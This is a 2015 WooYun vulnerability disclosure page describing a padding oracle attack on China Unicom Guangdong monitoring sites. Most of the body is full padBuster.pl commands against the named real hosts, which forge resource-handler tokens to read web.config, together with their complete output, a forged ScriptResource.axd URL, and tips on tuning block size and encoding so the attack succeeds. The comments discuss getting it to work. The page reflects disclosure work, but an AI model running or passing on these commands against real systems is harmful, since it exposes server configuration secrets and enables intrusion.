当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106017

漏洞标题:中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程

相关厂商:中国联通

漏洞作者: 几何黑店

提交时间:2015-04-08 14:09

修复时间:2015-05-25 18:52

公开时间:2015-05-25 18:52

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开

简要描述:

联通的漏洞是越来越多了

详细说明:

http://lar.unicomgd.com/

QQ图片20150405145422.png


上次报过的洞
http://wooyun.org/bugs/wooyun-2015-099087
今天无聊翻了翻原来发过的洞,看还有没有可利用的,嘿,还真有
ASPX的,看到这个,我就眼前一亮,果然......
我们来看看源代码

QQ图片20150405144358.png


祭出工具

QQ图片20150405145227.jpg


padBuster.pl http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 rF9mcFBXRdOs0vsKIxd7PQ2 16 -encoding 3 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       500     5923    N/A
2 **    255     500     5925    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (146) [Byte 16]
[+] Success: (147) [Byte 15]
[+] Success: (240) [Byte 14]
[+] Success: (125) [Byte 13]
[+] Success: (246) [Byte 12]
[+] Success: (165) [Byte 11]
[+] Success: (108) [Byte 10]
[+] Success: (23) [Byte 9]
[+] Success: (21) [Byte 8]
[+] Success: (84) [Byte 7]
[+] Success: (56) [Byte 6]
[+] Success: (224) [Byte 5]
[+] Success: (241) [Byte 4]
[+] Success: (161) [Byte 3]
[+] Success: (40) [Byte 2]
[+] Success: (246) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 9a5bd382c3443b7e3108cc9d1f9af692
[+] Intermediate Bytes (HEX): e627affcec335e1c1f6ba3f379f39193
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: mlvTgsNEO34xCMydH5r2kgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


解出第一个密钥,那么最终的密钥也就不远了
第二步密钥

http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0


很多人说遇到很多这种漏洞,但是跑不出来,以我的经验来看,WebResource.axd?d=后面的字符串越少越好跑出来,如果非常长,跑出来第一步密钥的几率比较小.
有时当我们碰到字符串比较长的,可以把16 -encoding 3 -plaintext "|||~/web.config" 中的3 改成其他的,比如:

-encoding [0-4]: Encoding Format of Sample (Default 0)
                  0=Base64, 1=Lower HEX, 2=Upper HEX
                  3=.NET UrlToken, 4=WebSafe Base64


当出现这个错误时

QQ图片20150405150740.png


我们可以把16 -encoding 3 -plaintext "|||~/web.config"中的16改成图上提示的数字.

漏洞证明:

另外还有两个
http://a.unicomgd.com/
http://b.unicomgd.com/

padBuster.pl http://b.unicomgd.com/WebResource.axd?d=0Z76PrPlS9S1mTbXUM_z
q1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 0Z76PrP
lS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL4
1uw41 66 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       8       500     8827    N/A
2 **    248     500     8825    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------


padBuster.pl http://a.unicomgd.com/WebResource.axd?d=yu_vV8xwAIAwLO27Y1AK
pzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 yu_vV8x
wAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7
YA1k1 64 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       8       500     8827    N/A
2 **    248     500     8825    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------


最终的密钥跑的太久了,就不跑了.

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-10 18:51

厂商回复:

已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-25 21:02 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    我擦。。这个洞真的能用么 我bugscan扫出来的就没成功过

  2. 2015-05-26 14:54 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    每个数据块的字节数,分为8和16,为啥改为64也可以?

  3. 2015-05-26 23:19 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    配置文件尝试跑了么,如果尝试了想知道跑出来没

  4. 2015-05-27 00:08 | PyNerd ( 普通白帽子 | Rank:156 漏洞数:28 | Just for shell.)

    @几何黑店 url被301怎么破

  5. 2015-05-27 01:54 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    @PyNerd 301的话一般我就放弃了

  6. 2015-06-04 23:09 | 孔卡 ( 实习白帽子 | Rank:42 漏洞数:12 | 我已经过了那个餐桌上只有一条鸡腿就一定能...)

    @几何黑店 http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0 这个是最终的web.config的路径吧 怎么读取不了 已经修复了? 64 -encoding 0 -plaintext 这个0一般不都是3么 你这里0是根据什么来的啊